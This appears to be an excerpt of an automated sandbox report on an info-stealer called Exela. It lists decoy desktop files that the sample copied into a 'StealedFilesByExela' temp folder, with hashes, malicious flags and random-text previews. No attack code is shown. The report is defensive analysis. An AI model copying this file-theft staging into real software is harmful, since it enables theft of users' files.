                                                                                                                                                                                                                                                          Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\KATAXZVCPS.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                          MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                          SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                          SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                          SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\KATAXZVCPS.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                                          MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                                          SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                                          SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                                          SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\KZWFNRXYKI.jpg

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\KZWFNRXYKI.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\LTKMYBSEYZ.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\NIKHQAIQAU.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\NWTVCDUMOB.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\NWTVCDUMOB.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\ONBQCLYSPU.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                          Malicious:true
